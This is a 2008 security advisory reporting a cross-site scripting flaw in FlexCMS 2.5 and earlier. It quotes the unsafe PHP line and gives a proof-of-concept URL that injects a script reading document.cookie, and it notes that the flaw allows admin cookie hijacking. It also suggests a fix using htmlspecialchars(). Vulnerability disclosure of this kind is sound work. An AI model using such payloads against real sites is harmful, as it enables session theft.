Security Advisory: FlexCMS <= 2.5 Cross Site Scripting Vulnerability

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  [DSECRG-08-036] Multiple Security Vulnerabilities in Freeway eCommerce 1.4.1.171
  NewsHOWLER 1.03 Beta Cookie Handling Via Sql injection
  PHP Live Helper <= 2.0.1 Multiple Vulnerabilities
  munky-bliki lfi

From: irancrash_(at)_gmail.com <irancrash_(at)_gmail.com>
Date: 18.08.2008
Subject: FlexCMS <= 2.5 Cross Site Scripting Vulnerability

----------------------------------------------------------------

Script : FlexCMS <= 2.5

Type : Cross Site Scripting Vulnerability

Alert : Low

----------------------------------------------------------------

Download From : http://www.flexcms.com/

----------------------------------------------------------------

Discovered by : Khashayar Fereidani Or Dr.Crash

My Website : HTTP://FEREIDANI.IR

Team Website : Http://IRCRASH.COM

Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com

----------------------------------------------------------------

Cross Site Scripting Vulnerability :

File Name : inc-core-admin-editor-previouscolorsjs.php

Vulnerable Variable : PreviousColorsString

Send Method : GET

Register_globals : On

Dangerous PHP Code (LINE 53) : print 'document.write(\''.$PreviousColorsString.
'\');';

Address :
http://example/inc-core-admin-editor-previouscolorsjs.
php?PreviousColorsString=<script>alert(document.
cookie)</script>

Attacker can hijack admin cookie with this vulnerability ....

Solution for patch : filter PreviousColorsString variable with htmlspecialchars() function ...

----------------------------------------------------------------

                       Tnx : God

                    HTTP://IRCRASH.COM

----------------------------------------------------------------